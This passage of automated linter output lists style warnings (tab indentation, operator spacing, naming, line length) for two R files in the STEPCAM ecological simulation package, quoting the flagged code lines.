^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:61:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L264) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:268:63:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L268) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:271:15:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:272:44:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L272) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      